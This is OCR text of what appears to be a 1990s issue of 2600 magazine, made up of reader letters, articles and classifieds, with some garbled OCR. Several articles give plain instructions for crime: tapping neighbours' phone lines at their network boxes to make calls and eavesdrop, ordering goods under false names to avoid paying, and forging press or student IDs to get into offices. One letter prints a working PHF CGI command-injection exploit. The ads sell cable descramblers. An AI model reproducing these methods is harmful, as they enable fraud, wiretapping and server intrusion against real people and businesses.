copies. We dont think it’s fair to deny someone access 
based solely on economic disadvantage, just as most 
people wouldnt deny someone the right to read a book if 
they couldn t afford to actually buy a copy. Software liter- 
acy is an important achievement and should be encour- 
aged, not segregated. And if the law doesn't reflect this, 
we not only have a right but an obligation to challenge it. 

We re sorry to hear that your friend lost her entire 
book due to a computer virus. Whoever told her that 
leaving a single copy on a computer was a safe thing to 
do made a big mistake. Hard drives crash all the time. 
Files become corrupted, even accidentally erased. Com- 
puters are stolen. To prevent this type of thing, the very 
first step should be to keep backups and make printouts 
on a regular basis. Your friend should also be careful 
what kinds of software she introduces to her system as 
viruses can be contained on almost anything. You can 
blame us if it makes you feel better but it won t make the 
viruses go away. And every article we print on how to 
use a virus is also an article on how to be protected from 
one, if vou take the time to learn. 

How you equate breaking a code to pointing a gun 
at someone is beyond us. Knowledge in itself is never a 
crime. The misuse of it is another matter entirely and 
one outside our responsibility. 

As for your suggestion that our readers do some- 
thing “useful”, it's quite unnecessary and rather insult- 
ing since a good number of them have been doing just 
that for some time. Our readers design the operating 
systems you use, the voice mail systems you call, the 
hardware you type on. And many of them never would 
have had the opportunity to even work in the field if they 
had to play by the rigid rules you seek to impose or be 
subject to your crippling moral code for their each and 
every action. We really hope you lighten up so you can 
someday see the potential you're trying to crush. 


Upgrade 


Dear 2600: 

Several people have written me about my article 
“Secret Codes” and the program it contained, 
CODEIT2.ZIP. Although the article says it is written in 
Power Basic 3.0, many people are trying to run it in 
QBASIC. This will not work. If anyone would like a 
more advanced version of the program and a compiled 
version, they can send e-mail to MRGALAXY@ 
AOL.COM. I will gladly e-mail them a copy of the 
newest version. The program is also available on AOL. 

MRGALAXY 


(continued on page 49) 
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It certainly was nice of AT&T to send us this check. But we sus- 
pect that in their haste to seize our long distance trunks, they 
didn't bother to check whether or not we owned the line in the 
first place. As it happens, we don't. 516-751-9970 is a NYNEX 
test number. It's always busy. It's a busy signal test. And we 
doubt they're busy using any long distance company. 





We have no idea why AT&T has the notion that we own this 
number. We do know that every time a check like this is cashed, 
NYNEX winds up charging themselves $5 to switch long dis- 
tance carriers on a line they never use. It's the corporate way. 
(Our legal counsel says we can't tell you whether or not we 
cashed the check. Sorry.) 
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SUBSCRIBER NETWORK INTERFACES 


by Frequency Man (FreqMan) 


Also known as Telephone Network In- 
terfaces, Subscriber Network Interfaces are 
now installed on all new homes. These de- 
vices are installed so that the homeowner 
can check to see if a fault is in his wiring or 
in the telephone company lines. In actual- 
ity, it is the spot where the local telephone 
company’s lines are plugged into your 
house. When you open one up, you will en- 
counter two (or more) modular jacks, with 
matching modular plugs running into them. 
The modular plugs are the telephone com- 
pany’s lines, and they will be plugged into 
the jacks, which are your actual phone 
lines. For a homeowner to find a fault he 
must do this: First, get a phone that he is 
sure is working. Second, go down to his 
SNI and open it up. He then will unplug the 
modular plug from the line that has a fault 
in it, and plug his working phone into it. 
What he is doing is plugging the phone into 
the phone lines before they enter the house. 
As you have probably figured, if the fault is 
not present when using the phone from his 
SNI, then the fault is in the wiring in his 
house. If the fault is still present when us- 
ing the phone from his SNI, then it is a 
problem with the local phone company’s 
lines. 

Although SNI’s are a pretty good idea, 
and can be handy for locating phone trou- 
bles, most homeowners have no idea what 
the little green box on the side of their 
house is, or what it is for. Chances are that 
many homeowners are not even aware of its 
presence. 

The most common of these devices is 
the model CAC 3000, manufactured by 
Siecor. I know for a fact there are different 
models and brands, but I have yet to en- 
counter one which wasn’t a CAC 3000. 


Even if you are not working with this 
model, this information will still be valu- 
able for all types of SNI’s. 

SNI’s are usually small green boxes, 
perhaps 10 inches by 10 inches, and are 
usually found bolted to the side of the 
house, usually screwed shut. Sometimes 
they say Subscriber Network Interface on 
the front. They have a little loop which you 
can put a padlock on, but almost none of 
them do. Most of them have two sections 
you can open. There is the “Customer Ac- 
cess” section, which is most often opened 
with a flathead screwdriver, and there is the 
telco service access, behind an extra plastic 
shield. This is usually opened with an allen 
wrench and contains more complicated 
wiring and components. This article is writ- 
ten to deal with the “(Customer Access” sec- 
tion, which is a lot of fun to play with by 
itself. So don’t worry - even though this in- 
formation isn’t highly technical, you can 
still have plenty of fun from the “Customer 
Access” spot. 


Fun Thing #1 

Since you have a jack right there, there 
are many things you can do with your 
neighbors’ lines. When your neighbors go 
out of town, that is the best time to do some 
tinkering with their lines, so from here on I 
am going to assume that you are out of 
harm’s way while playing with their SNI. 

For a quick and easy phone call that you 
need to make, all you need to do is grab 
your phone, run over to your neighbor’s 
SNI, unplug the modular plug leading into 
Line 1, (they will be labelled) and plug in 
your phone. Dial away. This is all easier if 
you are not using a cordless phone, because 
with a cordless you also need a power out- 
let, of course. The reason for plugging into 
Line 1 and not Line 2 is because many peo- 
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ple still only have one line, and it will be 
the one labeled Line | if this is the scenario. 
Your calls will obviously be billed to who- 
ever’s SNI you are using, for those of you 
who don’t catch on too quick. 


Fun Thing #2 

This is actually a variation of “Fun 
Thing #1”. Instead of having to run over to 
your neighbor’s house every time you don’t 
want to pay for a call, I suggest just running 
some phone line straight from their SNI to 
your house. The best thing to do is dig a 
trench about 2 inches deep. Take some hol- 
low black tubing, the thin kind, and run the 
telephone wire through that. Now place 
your protected phone wire in the trench and 
cover it up. Plug one end into your neigh- 
bor’s SNI jack, and the other end straight 
into a phone at your house. Now you got 
your neighbor’s phone line at your finger- 
tips. Keep in mind that as long as your 
phone is plugged into their SNI, they can’t 
use that line. This is why I save this for 
when they go on a two month vacation to 
Mayanmar. 


Fun Thing #3 

Purchase a phone line fork, so you can 
plug two phones into one jack. Stick the 
fork into the modular jack for Line | of 
your neighbor’s SNI. Now you have two 
modular jacks. In one of them, stick the line 
you have running to your house, like in 
“Fun Thing #2”, and in the other one, stick 
the matching modular plug for Line 1 of 
that house. This way, you can not only 
charge up their phone bill from your house, 
but you can also listen in on their phone 
conversations, and even add a little noise of 
your own if you wish. 


Fun Thing #4 

This is a little something you can built 
up gradually, as time goes on. Buy some 
sheet metal, and set up kind of a switch- 
board for all your neighbors’ lines. Every 
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time one of your neighbors go on vacation, 
or moves, or whatever, hook that person’s 
line from their SNI to your switchboard, the 
way explained in “Fun Thing #3”. Eventu- 
ally you will have quite an array of phone 
lines going into your house, and you can 
add in all sorts of gadgets to customize 
your switchboard to suit your needs. 

As clearly stated, SNI’s are a major tele- 
phone security flaw, and I love taking ad- 
vantage of it. It actually isn’t the telephone 
companies’ fault that this is so easy - it is 
the owner of the SNI. SNI’s are lockable, 
but never locked. Hideable, but never hid- 
den. Handy, but never used. These little 
green beauties are a lot of fun to play with 
in the summer, especially when all the folks 
in your neighborhood have taken off for 
their fun little summer vacation. This is def- 
initely the time to play with all these “Fun 
Things” I have told you about. Not like you 
wouldn’t have figured out what you could 
do with an SNI anyways, but at least these 
little tips help get your brain going. After 
all, if we didn’t use our brains, we would all 
end up like our neighbors. 
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UNFRIENDLY -> NUMBERS 


by Secret Squirrel 

Despite some new consumer protections in 
the telecommunications law, some pay-per-call 
providers are still misleading the public into 
making “free” 800 calls that end up costing sig- 
nificant sums of money. 

Below is a list of some 800 numbers that ad- 
vertise or charge for services. New numbers con- 


tinue to pop up all the time. The owners of these 
numbers technically follow the law, but the telcos 
refuse to deal with the misrepresentations be- 
cause they ultimately profit from all fraud. 

This information was recently liberated from 
internal MCI documents and was onginally com- 
piled by Joe Stevens of MCI Network Services 
Systems Integrity. 





215-2223 374-8487 568-3789 
234-7863 377-3655 568-6279 
234-8743 377-5683 572-0420 
238-5483 377-7883 589-5940 
252-0224 377-8653 626-6260 
260-6749 378-5425 643-0755 
274-7465 388-5347 643-7643 
274-7611 388-8462 666-3000 
275-3825 388-8636 666-3825 
275-4277 392-2661 666-4688 
275-4437 393-8895 667-6009 
275-4446 395-2661 669-7769 
275-4739 414-4475 677-5347 
275-4848 419-5425 677-6009 
283-1469 419-6969 677-6366 
283-1496 420-2661 678-2427 
283-3733 432-8906 678-5425 
283-3786 436-3660 678-8487 
283-4386 444-4323 684-5465 
283-7399 444-5425 685-2455 
285-0000 444-6749 688-2662 
285-4688 456-3825 688-6963 
285-5223 468-2223 692-2888 
285-5465 468-2868 695-3786 
285-6749 468-3283 695-5634 
286-1469 468-3825 697-7877 
289-6338 468-4475 699-3866 
289-7465 468-5239 701-4475 
300-3652 468-5878 723-5472 
326-3251 468-6454 733-5868 
326-3669 468-7399 733-5878 
328-3786 468-7588 733-7825 
328-4475 488-9453 733-7877 
328-4688 496-1661 733-8237 
333-5223 515-5425 733-8239 
333-6454 541-0007 736-7886 
335-6749 547-7165 745-0228 
342-5432 550-8286 745-1201 
365-6725 553-2223 746-1692 
365-9388 555-5472 752-5199 
369-3825 568-1661 752-5204 
374-4569 568-3337 753-3369 
374-4739 568-3786 753-7548 
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753-8788 876-4681 945-2473 
756-1600 876-5639 945-2661 
759-4323 876-5747 945-3166 
760-4688 876-7393 945-3382 
760-9453 876-7625 945-3736 
765-4878 876-7825 945-3786 
765-8788 877-0122 945-3825 
766-2469 877-3655 945-5347 
766-2789 877-5477 945-5465 
766-6749 879-7825 945-6662 
770-2442 879-9453 945-8487 
775-5839 883-5477 947-2661 
777-1152 887-0122 947-4323 
777-1249 888-5472 949-3669 
777-3666 892-5575 949-3699 
777-7825 916-6969 949-4688 
777-9388 920-2868 949-7399 
790-3825 922-3825 950-4739 
795-4323 925-7390 950-6749 
800-1723 926-2200 955-1717 
800-2976 929-2442 955-5165 
800-6278 929-4878 955-5465 
807-7595 929-8788 955-5477 
822-4475 933-2738 955-9447 
825-4629 933-3825 959-2625 
825-4688 933-8258 959-5465 
833-2523 933-9913 964-4475 
843-2223 934-3255 964-5472 
846-2868 937-2888 967-4323 
846-3648 938-2661 967-6725 
846-6749 938-2697 967-6749 
846-7393 938-2866 995-9938 
847-3301 938-2868 999-1061 
856-3992 938-3425 999-2223 
866-8339 938-3768 999-2625 
869-6662 938-3873 999-3825 
869-9664 938-4875 999-4553 
869-9681 938-7399 999-5477 
871-4739 938-8487 999-5683 
872-3825 938-8928 999-6666 
872-4739 944-5347 999-6749 
873-4642 944-6969 999-7825 
876-4639 945-2424 999-8255 
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GOW FO STERI GAIDGS 


by Ted Perver 


Everybody loves free stuff, especially 
expensive free stuff, especially when it’s re- 
ally not worth the high prices being asked 
for it. The answer? Mail order magic! 

It just so happens that I have a friend 
whose name sounds suspiciously like mine 
who has learned how to be a mail order ma- 
gician! This champion of consumer rights 
has already received hundreds of dollars in 
free merchandise using his magical mail or- 
der powers. I certainly hope that anyone 
reading this article doesn’t actually do any 
of the things described in it because, con- 
sumer rights or not, they may be illegal. 

My friend tells me that obtaining easy 
free merchandise in the mail is as simple as 
following these directions. 

He says that, first of all, this approach 
will not work for large items such as exer- 
cise equipment, computers, or anything 
else that would have to be signed for. This 
method is most effective for obtaining free 
CD’s, free books, possibly even free soft- 
ware and magazine subscriptions. Also, 
stick only to the giant companies like Time 
Life, Columbia House, and Rolling Stone 
Magazine. 

The first step is responding to the adver- 
tisement. If it is a television or radio ad, call 
the number and order the product to your 
address. Give a false name. It won’t matter; 
it’ll still arrive. Then, when asked how you 
will pay, ask them to bill you. If they don’t 
offer billing, abort the mission and hang up. 
If they do, then you’re all set. 

If you are subscribing to a magazine by 
filling out one of those subscription cards, 
just fill in your correct address with a false 
name and drop it in the mail. 

Eventually your new free merchandise 


Twill arrive with a bill. Open and begin to 
enjoy your new free merchandise and throw 
the bill in the trash. 

In about two weeks a second bill will ar- 
rive. Either directly on the bill or on a note 
enclosed with the bill, notify the company 
that no one by the name of so and so lives at 
your address and that no one in your house- 
hold has ordered or received any merchan- 
dise from their company. This works the 
same way with magazines. 

After two or three more weeks you will 
receive a postcard from the company in the 
mail which says something to the effect of 
“Sorry for the inconvenience - have a nice 
life!” 

Voila! That’s all there is to it. You’ve ei- 
ther got free music or a few free issues of 
your favorite overpriced magazine. 

This strategy is especially effective when 
used to purchase groups of merchandise 
such as 10 free CDs or five free books from 
a book club. It’s not hard to imagine the pos- 
sibilities this simple strategy offers. 

Personally, I think this simple mail order 
magic is not only beneficial for the pur- 
poses already described, but also as a view 
of how things work in the mail world, and 
perhaps even as a starting point for other 
mail order magic. 

Now a word or two of advice. My friend 
says that people should probably be careful 
about overdoing it as repeated encounters 
would probably get noticed eventually, even 
in a huge corporation. Also, he urges people 
not to indiscriminately order anything they 
see, but to target blatantly overpriced mer- 
chandise. He firmly believes that his mail 
order magic is a tool of consumer rights 
supporters who want to fight back against 
oppressive big businesses and the unjust 
and unfair pricing of certain merchandise. 
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(continued from page 19) 





Notes on Chart 

The chart (shown below) applies only to 
Holland, but is also related to Germany, 
Greece, and England, among other places. 

Order of serial output reads left to right. 
Only the VALUE and WORM bits can be set to 
zero. 

If a value bit of 8 units or more is written, 
the erase function will set all eight bits of the 
next lower value to 1's. 


PC turns over after 512 CLK pulses and se- 
quence repeats. 

Chip powers up at bit 0 which is always 1. 

Only the first 104 bits appear to be used. 
($00-$0C) 

Different types of chips may have different 
memory structures. All types can be identified 
by the first 64 bits of unalterable memory. 


Chipcard Socket Review 
I have looked at several different chipcard 
sockets. Some are really good and inexpensive 
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and some are unmentionably bad! ITT Cannon, 
Am phenol, and Alcatel all make very inexpen- 
sive “consumer” grade card sockets. All these 
makes come in both the “scratch the card” ($5 
or less) variety and the more expensive (around 
$15) less scratching types. All supply both ISO 
position or ISO and AFNOR 16 pin sockets at 
slightly higher cost of course. 

The above manufacturers also make con- 
sumer grade “less scratching” types where the 
contacts lower onto the card and only make 
slight scratches. A further improvement gets 
devices that lower the contacts directly on the 
module after insertion and take it up at the least 
tug of removing the card. 

In addition to the above makers, these 
midrange “commercial grade” sockets are 
made by Omron, ddm hopttschuler, Connec- 
tral. The “ddm” device is the superior choice 
with the Omron SCROJ-002 coming in second 
place with the others about the same. All are 
less than $60 list price. 

If you must hold the card, try an Omron 
3S4YR-SFROJ. It contains a microswitch that 
detects card entry, a card holding device 
(stronger than the card!) and a microswitch to 
indicate a locked down card. Red and green 
LED’s are provided for the user’s comfort and 
convenience and are obviously useful! List 
price is about $150. 

The “scratching” type is out of the question 
for any use that involves inserting and remov- 
ing a card repeatedly (estimated module life: 
from 10-100 times for the cheap (phone) cards 
and perhaps 10 times that for the smartcards 
with thicker gold plating). Their intended use is 
similar to an IC socket (they all are IC sockets) 
where a card would be left in place for some 
time, say in a GSM or pay TV decoded. If you 
want to hobby with these, you’ll waste a lot of 
cards! 

That is basically what is out there for the 
hobbyist. I didn’t go into the hyper expensive 
units that “swallow” the card as they are proba- 
bly not interesting to the hobbyist. There are 
many manufacturers of these specialized units. 
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SOCIAL bee a cite WAY 


by Bernz 

We live in a world where video and film 
cameras create a certain attitude. Watch the 
news one day. A camera and a reporter shoot 
a story. Every time a pedestrian walks by, 
they turn to the camera, make a stupid face, 
and grin. They are happy for those three sec- 
onds of background exposure. To me, this is 
an idiotic attitude, but it also represents a 
tear that can be converted into a chasm of a 
security hole. 

If someone told you sincerely, “I’m 
gonna put you in a movie”, you'd be happy. 
You'd get your big dose of mass communica- 
tion fame and fortune. Actually, we probably 
would think he’s an undercover cop and 
move out of state. But we’re a weird bunch 
and we can’t assume everyone’s a paranoid 
little fuck. 

What this brings me to is that almost 
everyone in the world loves the camera. This 
is a security flaw, believe it or not, that can 
be exploited to a great degree. 


What do you need? 

First things first. You need a camera. I 
would prefer Hi-8, but an old 8mm would do 
just fine. It must have sound and a relatively 
clear picture. Lots of videotape and batteries 
are good. You’ll also want a boom mike and 
a friend to carry it for you. Like all social en- 
gineering, professional appearance is what 
matters most of all. 

Next, you need credentials. You can’t just 
walk into your mark’s office and say “I’m 
gonna take video.” The fact that you have a 
camera and a sound guy is great and lends 
quite a bit to your appearance, but you need 
an edge. Hence, the film student. Almost 
every state has a college with film students in 
it. Finger accounts at these colleges. A great 
majority of colleges use Student ID numbers 





for logins. Use a desktop publisher and whip 
up some fake IDs on card stock. If you can’t 
do this on your own, someday Ill get off my 
ass and make templates. Make sure the 
names correspond to your sex. If you’ve got 
a beard and your “name” is Jennifer, I don’t 
think you’ll be taken seriously. 


Entrance 

You have your alibi for your appearance 
and your equipment. Go to the front office 
and talk to whoever it is that lets you in. Point 
the camera at the security guy. Tell him your 
film students or even better, news interns, 
shooting documentary footage on local (fill in 
company or governmental position here). Se- 
curity guards are not noted for their intelli- 
gence, nor are they noted for good pay and 
fun lives. Any chance to be on American or 
even (name a county here) television will 
make them cooperative. They’ll probably give 
you clearance if they can. If you have to keep 
up subterfuge to get in, do it. I can’t instruct 
you on that as it differs from case to case. 

A boss might have to confirm this. Even 
if it is a government place, chances are it’s a 
Dilbert-esque environment. The bosses are 
moronic and the workers are dim and with- 
out energy. The boss will let you in to pro- 
mote his office (and himself). Anyone in any 
corporate structure desires to advance much 
further. A good report on local news can def- 
initely help that out. That one-eyed god on 
your shoulder can enlighten any environ- 
ment though. Cameras bring an odd sense of 
wonderment to those being filmed. 

If you’re going to use the news scam, 
wear your fake IDs on the outside, like a real 
press person. 


(continued on page 26) 
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(continued from page 39) 


A Freer JUNO 


Dear 2600: 

If you’re like any normal person who uses JUNO 
(the free email service), you are probably annoyed at 
those stupid ads that fly across at your screen. Well I 
know I was pissed so | did something about it. All you 
have to do is go to your painting program and open up 
the .BMP files that are located in your JUNO\ADS sec- 
tion or wherever you installed JUNO. Change them 
however you want to. Then choose the save option. Be- 
cause the ads flash across your screen it had to be con- 
figured to move, write, and whatever bull they make it 
do. When you change it, it can no longer work. You can 
also edit the read and write buttons to create a small two 
picture movie. My JUNO looks totally different then it 
did when I first got it. I admit this isn’t a truly significant 
find or a noteworthy hack, but I’m a little happier now 
that I can send email in piece. 






phunhertz 


Cable Notes 


Dear 2600: 
In the last issue of 2600, 1 read Active Matrix’s arti- 


cle on the CFT2200 converter box by General Instru- 
ment. Matrix seemed concerned about the apparent lack 
of privacy by it being a two-way converter. Rest assured, 
Big Brother is not watching you. The CFT2200 is able 
to send low bandwidth return packet data to the main 
control computer. This computer stores cable account 
information about the customer, and current channel au- 
thorizations. When you hit the buy button to order pay 
per view, the box sends a request to the control com- 
puter, which in turn queries the request, and soon autho- 
rizes that channel and adds that to your bill. 

The control computer is incapable of storing large 
records on customers anyway, being that the typical 
plant serves 200,000 to 300,000 customers and the 
server is equipped with only five to six gigs of HD space. 

I hope I was of help. I don’t know what Starview is 


either. 
Platypus Man 


Gambling Hack 


Dear 2600: 

I read the article on casino hacking and I need to 
know if this person (or you or anyone you know) can 
help me locate any of the slot detectors or slot manipu- 
lators that are currently available. The slot detectors 
function by allowing the user to know when a slot ma- 
chine is in a payout cycle. The older ones used to click 
like a geiger counter but the new ones vibrate like a 
pager. When the slot machine goes into another cycle 


the detector slows down or completely stops vibrating, 
signaling the user to move onto another machine in the 
payout cycle. 

The slot manipulators function by allowing the user 
to pause the R.N.G. in the keno machines to repeat the 
same numbers, or the cards in the poker machines to re- 
peat in the double down mode. It was explained to me 
that this is similar to using the pause button on the VCR 
along with a frequency lock. 

I’ve seen both the slot detectors and manipulators 
used but can’t find out where to purchase them. Both are 
easily concealable and are undetectable electronically. 
I'd appreciate any and all help locating them. 

Guz 

When you find them, we expect you'll lead an excit- 


ing life. 
PHF Exploit 


Dear 2600: 

I was reading your Autumn 1996 issue and was 
wondering where fencer had to reach to pull out his arti- 
cle on “The PHF Exploit”. 

Let me attempt to correct some of the errors in the 
article. First of all, phf is a C program, and so is not and 
was not distributed in executable form in the cgi-bin di- 
rectory by NCSA httpd and Apache httpd. It is true, 
however, that many webmasters have blindly compiled 
and installed all the sample cgi programs distributed 
with NCSA or Apache httpd. 

Second: the author is completely mistaken about 
the purpose of phf. Phf is a web interface to the “ph” 
program, which is a client for the CCSO qi phonebook 
nameserver. This phonebook system is in place at 
around 300 universities around the world, and not many 
other places, which points out how little thought most 
webmasters put into the security risks they are accepting 
on their systems (they probably don’t have the “ph” pro- 
gram on their system, much less a phonebook to talk to, 
so what exactly is the point of installing phf?). 

Phf calls “ph” via popen() with user-supplied input 
(but all shell meta-characters except the newline charac- 
ter were escaped prior to the popen() call), and hence 
the entry point for the exploit. Fencer describes his ex- 
ploit but completely misses this point, which is at the 
heart of the exploit. 

For example, in the exploit (trimmed to the bare 
minimum of fluff you need to get it to work): 

echo “GET /cgi-bin/phf?Q=%0Atouch%20/tmp/ 
sucker” | nc www.sucker.com 80 

“%0A” is translated to the newline character by phf 
(and “%20” to a space), and so, not only does the “ph” 
get executed when popen() is called, but so does the 
command “touch /tmp/sucker”. 

I’m really impressed that despite no apparent knowl- 
edge of phf or how the exploit works, that fencer was 
clever enough to figure out that he could put any com- 
mand in the place where his exploit had “/bin/cat”. Wow. 
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Third: what fencer calls the “Q commands” in his 
exploit example, which he claims are required to be in- 
cluded in an exploit, are not required, save one. If he had 
read the source code to phf, or even if he had tried not 
including them as a test, he would discover that he could 
get by without providing all those fields in his exploit. 

Fourth: when telnetting to port 80 you don’t have to hit 
enter twice if you provide a query lacking the string 
“HTTP/1.0” at the end (indicating to the server that you are 
speaking the pre-HTTP/1.0 protocol which doesn’t send 
any HTTP request headers). You have to hit enter twice 
when providing an HTTP/1.0 query, because the server is 
otherwise in a state where it is expecting HTTP headers 
from you, until you end your query with a blank line. 

Doesn’t anyone review these articles before they go 
to press? 

Astraea 

Here is the author 5 reply: 

I am sorry you found such fault with the article. To 
address your concerns: several flavors of Apache and 
NCSA were distributed with the cgi-bin compile option 
open and when compiled as per their instructions and 
installed as per the general installation were in fact in- 
stalled. Both NCSA and Apache advised users that this 
Situation existed and that it was a screw-up. This is 
clearly mentioned to in the Apache Weekly Newsletter 
(issue 34). 

What they say is that if you install, you get the phf 
cgi as well as the others in the ./cgi-bin directory with- 
out it telling you that it did that. That was a screw-up, 
and an admitted one and they tried to warn people that 
this was indeed a problem. They also state, clearly, that 
if you get version 1.0.5 and above, it is no longer a prob- 
lem. This point has been driven home again and again 
on the Usenet apache news group and on their website. 
It was an oversight that Apache wasn t alone in making. 
NCSA released two distro’s that did this as well, and the 
version of phf they distrod was vulnerable to this 
“hack”. 

I called phf a cgi binary. That's what it is. I am not 
disputing the language it was written in. That doesn't 
pertain to this in any event. The purpose of phf may in- 
deed have been what you described, but it has in the 
past year featured heavily in mainstream articles as a 
tool to present files and information without the expen- 
sive SQL front ends - put simply, several articles detail- 
ing how to present database output using it. I am not 
excusing this use; I am simply saying that this is the 
modern use of the cgi. Some versions of phf require all 
of the fields, some don't. I thought that it was clear in 
the article. There is no harm in including them. I'm 
sorry if you misunderstood my intent. 

Fencer 


Monopolistic Motion 


Dear 2600: 
By the time this letter is seen, my local ISP will be 
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down. It’s a relatively small BBS in Nashville, TN called 
Sounds of Silence. It gets its phone lines from Bell 
South. Bell South, along with local government, has 
taken some actions that are producing hard times for all 
local ISP’s. Bell South’s part in this is that they’re start- 
ing their own ISP and trying to force the competition 
out. There is nothing that can stop them, because some- 
one found a loophole in a tax law here and is forcing an 
entertainment/sales tax on all services provided. At first, 
they said that they would start collecting on the tax this 
year. Now they say that the tax should have been col- 
lected since 1993, and have made the tax retroactive. All 
local ISPs must pay these back taxes. You can imagine 
how much it will cost. As of now, this system is going 
down on the ninth of November, and other systems are 
starting to feel the pressure from Bell South and the lo- 
cal government. 
(orbital) 
This is exactly the kind of thing a lot of us worried 
about when the phone companies started to show an in- 
terest in the net. Dont think that you're powerless here - 
getting the word out will definitely make a difference. 
People have seen the power of the net and they won't be 
very eager to hand it over to a corporate monopoly. 


A Fun Federal Story 


Dear 2600: 

I am writing this letter in reference to “And Justice 
For All”. To make a long story short.... 

My dad is a real estate appraiser in Montana. My 
dad works with another man in the same business. Pres- 
ident Clinton was on vacation in Jackson Hole, 
Wyoming. The man who works with my dad had to go 
to Jackson Hole to do an appraisal. When he got there, 
he went to the courthouse to do some work and found a 
part going on. He asked what was going on and they 
told him the following story: 

A man had flown into the Jackson Hole airport, 
someone who lived in the area. He went to the parking 
lot, got in his jeep, and started to drive home. He hap- 
pened to drive past some FBI agents who were prowling 
the neighborhood. He had a bumper sticker that said 
“Clinton Gone in Four’. The FBI saw this and pulled 
him over. They manhandle him out of his jeep and tell 
him to remove the bumper sticker. The man refused 
based on the belief that this is a free country. They pro- 
ceed to frisk him and basically beat the shit out of him. 
A Jackson Hole sheriff’s deputy came along at this point 
and asked what the trouble was. The FBI told him the 
man wouldn’t remove the bumper sticker. The sheriff’s 
deputy said the man in the jeep had the right to say what 
he wanted to. The FBI agents said no. At this point the 
sheriff’s deputy pulled his gun and put it to the head of 
one of the FBI agents and said “Let him go.” They did. 
The sheriff’s deputy told the FBI to go fuck themselves. 
He was not afraid of the big bad feds. He was a hero in 
Jackson Hole and that’s why the party was taking place. 
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There never was a report filed. But it happened and the 
feds lost. Clinton left and things went back to normal. 
The FBI went home with their tail between their legs. 
Too bad. 
love 357 
A very interesting story but we have one observa- 
tion. The tactics and behavior you refer to sound very 
much like the Secret Service. Is it possible these were the 
people in Jackson Hole that day? 


Disturbing News 


Dear 2600: 

Please find the enclosed mailing I received from the 
USPS. This was triggered when I closed my P.O. box 
and filed a change of address. What are they doing send- 
ing me a letter to remind the IRS of my new address? 
This letter is dated ten days after filing the COA. The 
most disturbing thing is the use of a pre-printed and 
postage paid envelope. | would like to know if any other 
readers have had a similar experience. 

Rich D. 

We agree this is a troubling and ominous form to re- 
ceive. The IRS and the post office seem to have become 
real good friends. 


Porn Sting Update 


Dear 2600: 

I came across some more information about the 
porn sting in Colorado that you might find interesting. 
The (303) 293-2953 number printed is now “discon- 
nected or no longer in service” when one calls. This 
happened just after 2600 hit the stands. Hopefully, F’s 
letter had an impact. However, the porn sting contin- 
ues... there are four other phone numbers using the same 
Audix system: (303) 637-6391 for S&M, 6392 for 
young boys, 6393 for young girls, 6394 for animals. 

Also, the mail drop for this sting is PO. Box 
300464, Denver, CO 80203-0464, which happens to be 
a major postal facility and two blocks from the postal 
inspector’s office. 

They are also trying to entrap people into physical 
meetings where they are then arrested. For instance, let- 
ters came from a guy named Kreeger (a fake Arvada po- 
lice name) trying to set up sex liaisons for cash. He wrote 
from an address on West 58th Place in Arvada with 
apartment 311E. A few of us investigated that address. 
It’s an apartment building but there is no apartment 
311E. However, there is a mail drop off for them. Simply 
put, they are trying to entrap people for solicitation. 

I am interested if there are any more stories about 
this sting and any others. Thanks to your magazine, we 
can read about what the government is trying to do. 

BD 
Denver 

If this does turn out to be a sting, it has to be one of 

the most ill-conceived and clumsily run ones that we've 


ever seen. The only thing more embarrassing than run- 
ning such a circus would be to get busted by it. 


NYNEX Neighbor Problems 


Dear 2600: 

I have been a reader of your magazine for a year. 
Your magazine is read by a lot of people and I really en- 
joy it. I am not a member for fear of being placed on a 
government list of potential troublemakers that was 
started up again after the Oklahoma bombing. 

The reason I am writing to you is because I have a 
neighbor who has worked for NYNEX telephone repair 
for a long time. This person knows all the angles. My 
telephone service is obsolete in my view because I was 
told by a sympathetic NYNEX employee that she was 
recording all conversations as well as all numbers going 
into and out of my phone line. She has deleted messages 
on my pagers and called potential employers and told 
them I was not looking for work or that | and my family 
members were incompetent. She has my neighborhood 
on her side since we are quiet people and they have not 
heard our side to realize that she loves to cause trouble. 
This is why she was forced to move from her last loca- 
tion. I know where she works out of but am not really 
sure what I can do. Strange events are also happening to 
anyone who has called my home or people who have 
been called by me in the last year. I have called the 
NYNEX operators, the police, and received no re- 
sponse. I have also received an “I’m not sure” from the 
Attorney General’s office. As of now I do not have any 
phone service or beeper service. If you could please ask 
your readers for any options I may have, I would be for- 
ever indebted to you. 

Guard of the Gate 
Somewhere in MA 

Its hard to believe that a “sympathetic” NYNEX 
employee would tell you that another NYNEX employee 
was recording your conversations and then do nothing 
about it. In all likelihood the two of them had a good 
laugh about it afterwards. While a corrupt telco em- 
ployee can indeed cause havoc in your life, they will 
eventually slip up in some way and be detected. The im- 
portant thing is not to make yourself the object of atten- 
tion when you call to investigate these matters. If your 
claims seem too wild or you appear too desperate, 
you'll be dismissed as a nut. Hard as it may be, you 
need to be patient with the people you talk with so that 
you have a fair chance of getting them on your side. 
Once your claims are taken seriously, these people 
should work with you to find the answer, which may or 
may not be what you already suspect. In all likelihood, 
this neighbor of yours is playing mind games to make 
you think shes capable of doing anything. The way to 
win is not to play. 


lettersia 2600.com 
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R e E O Happenings GEM SEP ENE 2 


BEYOND HOPE. It’s the long-awaited sequel to 
Hackers On Planet Earth and it takes place next 
summer in New York City! Location and regis- 
tration info will be announced soon. Contact our 
voice BBS for more info: (516) 473-2626 or 
email: beyondhope@2600.com or check our web 
site: www.2600.com. 


m a m am For Sale a= EEE GzP ee 


“LINUX95: The Choice of a GNU Genera- 
tion” bumper stickers! Don’t be caught without 
one. $1 each (postpaid) US cash or postal money 
order. Design Science Labs, PO Box 542, Berea, 
OH 44017-0542. 

INFORMATION IS POWER! Our catalog is 
available with informational manuals, programs, 
files, books, and video. Get the information from 
the experts in hacking, phreaking, cracking, elec- 
tronics, viruses, anarchy techniques, and the in- 
ternet here. Legit and recognized world-wide, 
our information will elevate you to a higher 
plane of consciousness. Join Today! Send $1 for 
our Catalog to: SotMESC, Box 573, Long Beach, 
MS 39560. 

TAP BACK ISSUES, complete set. Vol. 1-91 of 
QUALITY copies from originals. Includes sche- 
matics and indexes. $100 postpaid. Via UPS or 
first class mail. Copy of 1971 Esquire article 
“The Secrets of the Little Blue Box” $5 & large 
SASE w/52 cents of stamps. Pete G., PO Box 
463, Mt. Laurel, NJ 08054. We are the original! 
FREE CABLE TV: Cable TV boxes enable you 
to receive “every pay channel” for FREE as well 
as pay-per-view. Stop paying outrageous fees for 
pay channels. Box cannot be bulleted! You must 
call or email first and tell us the brand and model 
number of the cable box you have. Example: Jer- 
told DPVSXXX. Only $199 U.S. & $15 shipping 
& handling. Our units work with Jerrold, Pio- 
